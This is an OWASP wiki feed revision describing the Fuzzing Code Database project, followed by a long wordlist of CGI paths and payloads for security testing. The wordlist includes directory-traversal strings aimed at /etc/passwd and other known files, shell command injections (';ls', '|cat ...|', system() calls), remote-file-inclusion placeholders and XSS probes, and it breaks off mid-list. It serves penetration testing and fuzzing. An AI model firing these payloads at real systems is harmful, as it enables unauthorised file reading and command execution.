| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]&lt;/div&gt;</summary>
		<author><name>Adam.muntner</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80080</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80080"/>
				<updated>2010-03-17T21:14:09Z</updated>
		
		<summary type="html">&lt;p&gt;Adam.muntner: /* Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2009 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News  ====&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010'''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements'' &lt;br /&gt;
&lt;br /&gt;
*15 new XML Statements &lt;br /&gt;
*93 new SQL Injections Statements &lt;br /&gt;
*67 new Traversal Directory Statements &lt;br /&gt;
*Delete 33 XSS Statement Duplicate &lt;br /&gt;
*30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Updated the objectives of the project.&lt;br /&gt;
&lt;br /&gt;
'''21 July 2009''' &lt;br /&gt;
&lt;br /&gt;
*Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals  ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. &lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project: &lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases &lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: &lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. &lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. &lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements. &lt;br /&gt;
&lt;br /&gt;
==== Statements  ====&lt;br /&gt;
&lt;br /&gt;
=== Vulnerable Cross-Platform CGI (17 March 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Vulnerable Cross-Platform CGI (17 March 2010) &lt;br /&gt;
# fuzz inside cgi directories&lt;br /&gt;
# on windows, this is usually /scripts or /bin or /cgi-bin, on unix, usually /cgi-bin, /nph-cgi&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
%2e%2e/abyss.conf&lt;br /&gt;
.access&lt;br /&gt;
.cobalt&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;img%20src=javascript:alert('XSS')&amp;gt;&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
.fhp&lt;br /&gt;
.htaccess&lt;br /&gt;
.htaccess.old&lt;br /&gt;
.htaccess.save&lt;br /&gt;
.htaccess~&lt;br /&gt;
.htpasswd&lt;br /&gt;
.nsconfig&lt;br /&gt;
.passwd&lt;br /&gt;
.www_acl&lt;br /&gt;
.wwwacl&lt;br /&gt;
/_vti_pvt/doctodep.btr&lt;br /&gt;
14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
14all.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
AT-admin.cgi&lt;br /&gt;
AT-generate.cgi&lt;br /&gt;
Album?mode=album&amp;amp;album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&amp;amp;dispsize=640&amp;amp;start=0&lt;br /&gt;
AnyBoard.cgi&lt;br /&gt;
AnyForm&lt;br /&gt;
AnyForm2&lt;br /&gt;
Backup/add-passwd.cgi&lt;br /&gt;
C&lt;br /&gt;
Count.cgi&lt;br /&gt;
DC&lt;br /&gt;
DCFORM&lt;br /&gt;
File&lt;br /&gt;
FormHandler.cgi?realname=aaa&amp;amp;email=aaa&amp;amp;reply_message_template=%2Fetc%2Fpasswd&amp;amp;reply_message_from=sq%40example.com&amp;amp;redirect=http%3A%2F%2Fwww.example.com&amp;amp;recipient=sq%40example.com&lt;br /&gt;
FormMail.cgi?&amp;lt;script&amp;gt;alert(\&lt;br /&gt;
FormMail.pl&lt;br /&gt;
ImageFolio/admin/admin.cgi&lt;br /&gt;
LWGate&lt;br /&gt;
LWGate.cgi&lt;br /&gt;
Upload.pl&lt;br /&gt;
Vs&lt;br /&gt;
W&lt;br /&gt;
YaBB.pl?board=news&amp;amp;action=display&amp;amp;num=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
YaBB/YaBB.cgi?board=BOARD&amp;amp;action=display&amp;amp;num=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp4.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
add_ftp.cgi&lt;br /&gt;
addbanner.cgi&lt;br /&gt;
adduser.cgi&lt;br /&gt;
admin.cgi&lt;br /&gt;
admin.cgi?list=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
admin.php&lt;br /&gt;
admin.php3&lt;br /&gt;
admin.pl&lt;br /&gt;
adminhot.cgi&lt;br /&gt;
adminwww.cgi&lt;br /&gt;
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
aglimpse&lt;br /&gt;
aglimpse.cgi&lt;br /&gt;
alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
amadmin.pl&lt;br /&gt;
anacondaclip.pl?template=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
ans/ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
anyboard.cgi&lt;br /&gt;
archie&lt;br /&gt;
architext_query.cgi&lt;br /&gt;
architext_query.pl&lt;br /&gt;
ash&lt;br /&gt;
astrocam.cgi&lt;br /&gt;
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL&lt;br /&gt;
auction/auction.cgi?action=&lt;br /&gt;
auctiondeluxe/auction.pl&lt;br /&gt;
auktion.cgi?menue=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
auth_data/auth_user_file.txt&lt;br /&gt;
awl/auctionweaver.pl&lt;br /&gt;
awstats.pl&lt;br /&gt;
awstats/awstats.pl&lt;br /&gt;
ax-admin.cgi&lt;br /&gt;
ax.cgi&lt;br /&gt;
axs.cgi&lt;br /&gt;
badmin.cgi&lt;br /&gt;
banner.cgi&lt;br /&gt;
bannereditor.cgi&lt;br /&gt;
bash&lt;br /&gt;
bb-hist?HI&lt;br /&gt;
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbs_forum.cgi&lt;br /&gt;
betsie/parserl.pl/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;;&lt;br /&gt;
bigconf.cgi?command=view_textfile&amp;amp;file={KNOWNFILE}&amp;amp;filters=&lt;br /&gt;
bizdb1-search.cgi&lt;br /&gt;
blog/&lt;br /&gt;
blog/mt-check.cgi&lt;br /&gt;
blog/mt-load.cgi&lt;br /&gt;
blog/mt.cfg&lt;br /&gt;
bnbform&lt;br /&gt;
bnbform.cgi&lt;br /&gt;
book.cgi?action=default&amp;amp;current=|cat%20{KNOWNFILE}|&amp;amp;form_tid=996604045&amp;amp;prev=main.html&amp;amp;list_message_index=10&lt;br /&gt;
boozt/admin/index.cgi?section=5&amp;amp;input=1&lt;br /&gt;
bsguest.cgi?email=x;ls&lt;br /&gt;
bslist.cgi?email=x;ls&lt;br /&gt;
build.cgi&lt;br /&gt;
bulk/bulk.cgi&lt;br /&gt;
c_download.cgi&lt;br /&gt;
cached_feed.cgi&lt;br /&gt;
cachemgr.cgi&lt;br /&gt;
cal_make.pl?p0=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
calendar&lt;br /&gt;
calendar.php?calbirthdays=1&amp;amp;action=getday&amp;amp;day=2001-8-15&amp;amp;comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22&lt;br /&gt;
calendar.pl&lt;br /&gt;
calendar/calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calendar/index.cgi&lt;br /&gt;
calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calender_admin.pl&lt;br /&gt;
campas?%0acat%0a{KNOWNFILE}%0a&lt;br /&gt;
cart.pl&lt;br /&gt;
cart.pl?db='&lt;br /&gt;
cartmanager.cgi&lt;br /&gt;
cbmc/forums.cgi&lt;br /&gt;
ccbill-local.cgi?cmd=MENU&lt;br /&gt;
ccbill-local.pl?cmd=MENU&lt;br /&gt;
cgforum.cgi&lt;br /&gt;
cgi-lib.pl&lt;br /&gt;
cgicso?query=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cgicso?query=AAA&lt;br /&gt;
cgiforum.pl?thesection=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
cgiwrap&lt;br /&gt;
cgiwrap/%3Cfont%20color=red%3E&lt;br /&gt;
cgiwrap/~@U&lt;br /&gt;
cgiwrap/~JUNK(5)&lt;br /&gt;
cgiwrap/~root&lt;br /&gt;
change-your-password.pl&lt;br /&gt;
classified.cgi&lt;br /&gt;
classifieds&lt;br /&gt;
classifieds.cgi&lt;br /&gt;
classifieds/classifieds.cgi&lt;br /&gt;
classifieds/index.cgi&lt;br /&gt;
clickcount.pl?view=test&lt;br /&gt;
clickresponder.pl&lt;br /&gt;
code.php&lt;br /&gt;
code.php3&lt;br /&gt;
com5..........................................................................................................................................................................................................................box&lt;br /&gt;
com5.java&lt;br /&gt;
com5.pl&lt;br /&gt;
commandit.cgi&lt;br /&gt;
commerce.cgi?page=../../../../../../../../../..{KNOWNFILE}%00index.html&lt;br /&gt;
common.php?f=0&amp;amp;ForumLang=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
common/listrec.pl&lt;br /&gt;
common/listrec.pl?APP=qmh-news&amp;amp;TEMPLATE=;ls%20/etc|&lt;br /&gt;
compatible.cgi&lt;br /&gt;
count.cgi&lt;br /&gt;
counter-ord&lt;br /&gt;
counterbanner&lt;br /&gt;
counterbanner-ord&lt;br /&gt;
counterfiglet-ord&lt;br /&gt;
counterfiglet/nc/&lt;br /&gt;
cs&lt;br /&gt;
csChatRBox.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csGuestBook.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csLive&lt;br /&gt;
csNews.cgi&lt;br /&gt;
csNewsPro.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csPassword.cgi&lt;br /&gt;
csPassword/csPassword.cgi&lt;br /&gt;
csh&lt;br /&gt;
cstat.pl&lt;br /&gt;
cutecast/members/&lt;br /&gt;
cvsblame.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=*&amp;amp;rev=&amp;amp;root=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?branch=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;date=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=&amp;amp;dir=&amp;amp;file=&amp;amp;who=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;sortby=Date&amp;amp;hours=2&amp;amp;date=week&lt;br /&gt;
cvsqueryform.cgi?cvsroot=/cvsroot&amp;amp;module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=HEAD&lt;br /&gt;
dansguardian.pl?DENIEDURL=&amp;lt;/a&amp;gt;&amp;lt;script&amp;gt;alert('XSS');&amp;lt;/script&amp;gt;&lt;br /&gt;
dasp/fm_shell.asp&lt;br /&gt;
data/fetch.php?page=&lt;br /&gt;
date&lt;br /&gt;
day5datacopier.cgi&lt;br /&gt;
day5datanotifier.cgi&lt;br /&gt;
db2www/library/document.d2w/show&lt;br /&gt;
db4web_c/dbdirname/{KNOWNFILE}&lt;br /&gt;
db_manager.cgi&lt;br /&gt;
dbman/db.cgi?db=no-db&lt;br /&gt;
dcforum.cgi?az=list&amp;amp;forum=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
dcshop/auth_data/auth_user_file.txt&lt;br /&gt;
dcshop/orders/orders.txt&lt;br /&gt;
dfire.cgi&lt;br /&gt;
diagnose.cgi&lt;br /&gt;
dig.cgi&lt;br /&gt;
directorypro.cgi?want=showcat&amp;amp;show=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
displayTC.pl&lt;br /&gt;
dnewsweb&lt;br /&gt;
donothing&lt;br /&gt;
dose.pl?daily&amp;amp;somefile.txt&amp;amp;|ls|&lt;br /&gt;
download.cgi&lt;br /&gt;
dumpenv.pl&lt;br /&gt;
edit.pl&lt;br /&gt;
empower?DB=whateverwhatever&lt;br /&gt;
emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
enter.cgi&lt;br /&gt;
environ.cgi&lt;br /&gt;
environ.pl&lt;br /&gt;
environ.pl?param1=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
eshop.pl/seite=;cat%20eshop.pl|&lt;br /&gt;
ex-logger.pl&lt;br /&gt;
excite&lt;br /&gt;
excite;IF&lt;br /&gt;
ezadmin.cgi&lt;br /&gt;
ezboard.cgi&lt;br /&gt;
ezman.cgi&lt;br /&gt;
ezshopper/loadpage.cgi?user_id=1&amp;amp;file=|cat%20{KNOWNFILE}|&lt;br /&gt;
ezshopper/search.cgi?user_id=id&amp;amp;database=dbase1.exm&amp;amp;template=../../../../../../..{KNOWNFILE}&amp;amp;distinct=1&lt;br /&gt;
ezshopper2/loadpage.cgi&lt;br /&gt;
ezshopper3/loadpage.cgi&lt;br /&gt;
faqmanager.cgi?toc={KNOWNFILE}%00&lt;br /&gt;
faxsurvey?cat%20{KNOWNFILE}&lt;br /&gt;
filemail&lt;br /&gt;
filemail.pl&lt;br /&gt;
finger&lt;br /&gt;
finger.pl&lt;br /&gt;
flexform&lt;br /&gt;
flexform.cgi&lt;br /&gt;
fom.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
fom/fom.cgi?cmd=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=1&amp;amp;keywords=vulnerable&lt;br /&gt;
formmail&lt;br /&gt;
formmail.cgi&lt;br /&gt;
formmail.cgi?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail.pl&lt;br /&gt;
formmail.pl?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
fortune&lt;br /&gt;
ftp.pl&lt;br /&gt;
ftpsh&lt;br /&gt;
gH.cgi&lt;br /&gt;
gbadmin.cgi?action=change_adminpass&lt;br /&gt;
gbadmin.cgi?action=change_automail&lt;br /&gt;
gbadmin.cgi?action=colors&lt;br /&gt;
gbadmin.cgi?action=setup&lt;br /&gt;
gbook/gbook.cgi?_MAILTO=xx;ls&lt;br /&gt;
gbpass.pl&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../..{KNOWNFILE}%00board=board_1&lt;br /&gt;
getdoc.cgi&lt;br /&gt;
gettransbitmap&lt;br /&gt;
glimpse&lt;br /&gt;
gm-authors.cgi&lt;br /&gt;
gm-cplog.cgi&lt;br /&gt;
gm.cgi&lt;br /&gt;
guestbook.cgi&lt;br /&gt;
guestbook.cgi?user=cpanel&amp;amp;template=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
guestbook.pl&lt;br /&gt;
guestbook/passwd&lt;br /&gt;
handler.cgi&lt;br /&gt;
hitview.cgi&lt;br /&gt;
horde/test.php&lt;br /&gt;
horde/test.php?mode=phpinfo&lt;br /&gt;
hsx.cgi?show=../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
htgrep?file=index.html&amp;amp;hdr={KNOWNFILE}&lt;br /&gt;
html2chtml.cgi&lt;br /&gt;
html2wml.cgi&lt;br /&gt;
htmlscript?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E&lt;br /&gt;
htsearch?-c/nonexistant&lt;br /&gt;
htsearch?config=foofighter&amp;amp;restrict=&amp;amp;exclude=&amp;amp;method=and&amp;amp;format=builtin-long&amp;amp;sort=score&amp;amp;words=&lt;br /&gt;
htsearch?exclude=%60{KNOWNFILE}%60&lt;br /&gt;
ibill.pm&lt;br /&gt;
icat&lt;br /&gt;
if/admin/nph-build.cgi&lt;br /&gt;
ikonboard/help.cgi?&lt;br /&gt;
imageFolio.cgi&lt;br /&gt;
imagefolio/admin/admin.cgi&lt;br /&gt;
imagemap&lt;br /&gt;
include/new-visitor.inc.php&lt;br /&gt;
index.js0x70&lt;br /&gt;
index.pl&lt;br /&gt;
info2www&lt;br /&gt;
info2www '(../../../../../../../bin/mail root &amp;lt;{KNOWNFILE}&amp;gt;&lt;br /&gt;
infosrch.cgi&lt;br /&gt;
ion-p?page=../../../../..{KNOWNFILE}&lt;br /&gt;
jailshell&lt;br /&gt;
jj&lt;br /&gt;
journal.cgi?folder=journal.cgi%00&lt;br /&gt;
ksh&lt;br /&gt;
lastlines.cgi?process&lt;br /&gt;
listrec.pl&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
log-reader.cgi&lt;br /&gt;
log/&lt;br /&gt;
log/nether-log.pl?checkit&lt;br /&gt;
login.cgi&lt;br /&gt;
login.pl&lt;br /&gt;
login.pl?course_id=\&lt;br /&gt;
logit.cgi&lt;br /&gt;
logs.pl&lt;br /&gt;
logs/&lt;br /&gt;
logs/access_log&lt;br /&gt;
logs/error_log&lt;br /&gt;
lookwho.cgi&lt;br /&gt;
ls&lt;br /&gt;
lwgate&lt;br /&gt;
lwgate.cgi&lt;br /&gt;
magiccard.cgi?pa=3Dpreview&amp;amp;amp;next=3Dcustom&amp;amp;amp;page=3D../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mail&lt;br /&gt;
mail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mail/nph-mr.cgi?do=loginhelp&amp;amp;configLanguage=../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mailit.pl&lt;br /&gt;
maillist.cgi&lt;br /&gt;
maillist.pl&lt;br /&gt;
mailnews.cgi&lt;br /&gt;
main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
majordomo.pl&lt;br /&gt;
man2html&lt;br /&gt;
mastergate/search.cgi?search=0&amp;amp;search_on=all&lt;br /&gt;
meta.pl&lt;br /&gt;
mgrqcgi&lt;br /&gt;
mini_logger.cgi&lt;br /&gt;
mmstdod.cgi&lt;br /&gt;
moin.cgi?test&lt;br /&gt;
mojo/mojo.cgi&lt;br /&gt;
mrtg.cfg?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=blah&lt;br /&gt;
ms_proxy_auth_query/&lt;br /&gt;
mt-static/&lt;br /&gt;
mt-static/mt-check.cgi&lt;br /&gt;
mt-static/mt-load.cgi&lt;br /&gt;
mt-static/mt.cfg&lt;br /&gt;
mt/&lt;br /&gt;
mt/mt-check.cgi&lt;br /&gt;
mt/mt-load.cgi&lt;br /&gt;
mt/mt.cfg&lt;br /&gt;
multihtml.pl?multi={KNOWNFILE}%00html&lt;br /&gt;
musicqueue.cgi&lt;br /&gt;
myguestbook.cgi?action=view&lt;br /&gt;
namazu.cgi&lt;br /&gt;
nbmember.cgi?cmd=list_all_users&lt;br /&gt;
netauth.cgi?cmd=show&amp;amp;page=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
netpad.cgi&lt;br /&gt;
newsdesk.cgi?t=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
nimages.php&lt;br /&gt;
nlog-smb.cgi&lt;br /&gt;
nlog-smb.pl&lt;br /&gt;
non-existent.pl&lt;br /&gt;
noshell&lt;br /&gt;
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
nph-error.pl&lt;br /&gt;
nph-exploitscanget.cgi&lt;br /&gt;
nph-maillist.pl&lt;br /&gt;
nph-publish&lt;br /&gt;
nph-publish.cgi&lt;br /&gt;
nph-showlogs.pl?files=../../&amp;amp;filter=.*&amp;amp;submit=Go&amp;amp;linecnt=500&amp;amp;refresh=0&lt;br /&gt;
nph-test-cgi&lt;br /&gt;
ntitar.pl&lt;br /&gt;
opendir.php?{KNOWNFILE}&lt;br /&gt;
orders/orders.txt&lt;br /&gt;
pagelog.cgi&lt;br /&gt;
pals-cgi?palsAction=restart&amp;amp;documentName={KNOWNFILE}&lt;br /&gt;
parse-file&lt;br /&gt;
pass&lt;br /&gt;
passwd&lt;br /&gt;
passwd.txt&lt;br /&gt;
password&lt;br /&gt;
pbcgi.cgi?name=Joe%Camel&amp;amp;email=%3C&lt;br /&gt;
perl&lt;br /&gt;
perl?-v&lt;br /&gt;
perlshop.cgi&lt;br /&gt;
pfdispaly.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
pfdispaly.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
pfdisplay.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
phf&lt;br /&gt;
phf.cgi?QALIA&lt;br /&gt;
phf?Qname=root%0Acat%20{KNOWNFILE}%20&lt;br /&gt;
photo/&lt;br /&gt;
photo/manage.cgi&lt;br /&gt;
photo/protected/manage.cgi&lt;br /&gt;
php-cgi&lt;br /&gt;
php.cgi?{KNOWNFILE}&lt;br /&gt;
plusmail&lt;br /&gt;
pollit/Poll_It_&lt;br /&gt;
pollssi.cgi&lt;br /&gt;
post-query&lt;br /&gt;
post_query&lt;br /&gt;
postcards.cgi&lt;br /&gt;
powerup/r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
printenv&lt;br /&gt;
printenv.tmp&lt;br /&gt;
probecontrol.cgi?command=enable&amp;amp;username=cancer&amp;amp;password=killer&lt;br /&gt;
processit.pl&lt;br /&gt;
profile.cgi&lt;br /&gt;
pu3.pl&lt;br /&gt;
publisher/search.cgi?dir=jobs&amp;amp;template=;cat%20{KNOWNFILE}|&amp;amp;output_number=10&lt;br /&gt;
query&lt;br /&gt;
query?mss=%2e%2e/config&lt;br /&gt;
quickstore.cgi?page=../../../../../../../../../..{KNOWNFILE}%00html&amp;amp;cart_id=&lt;br /&gt;
quikstore.cfg&lt;br /&gt;
quizme.cgi&lt;br /&gt;
r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ratlog.cgi&lt;br /&gt;
redirect&lt;br /&gt;
register.cgi&lt;br /&gt;
replicator/webpage.cgi/&lt;br /&gt;
responder.cgi&lt;br /&gt;
retrieve_password.pl&lt;br /&gt;
rksh&lt;br /&gt;
rmp_query&lt;br /&gt;
robadmin.cgi&lt;br /&gt;
robpoll.cgi&lt;br /&gt;
rpm_query&lt;br /&gt;
rsh&lt;br /&gt;
rtm.log&lt;br /&gt;
rwcgi60&lt;br /&gt;
rwcgi60/showenv&lt;br /&gt;
rwwwshell.pl&lt;br /&gt;
sawmill5?rfcf+%22{KNOWNFILE}%22+spbn+1,1,21,1,1,1,1&lt;br /&gt;
sawmill?rfcf+%22&lt;br /&gt;
sbcgi/sitebuilder.cgi&lt;br /&gt;
scoadminreg.cgi&lt;br /&gt;
scripts/*%0a.pl&lt;br /&gt;
search.cgi&lt;br /&gt;
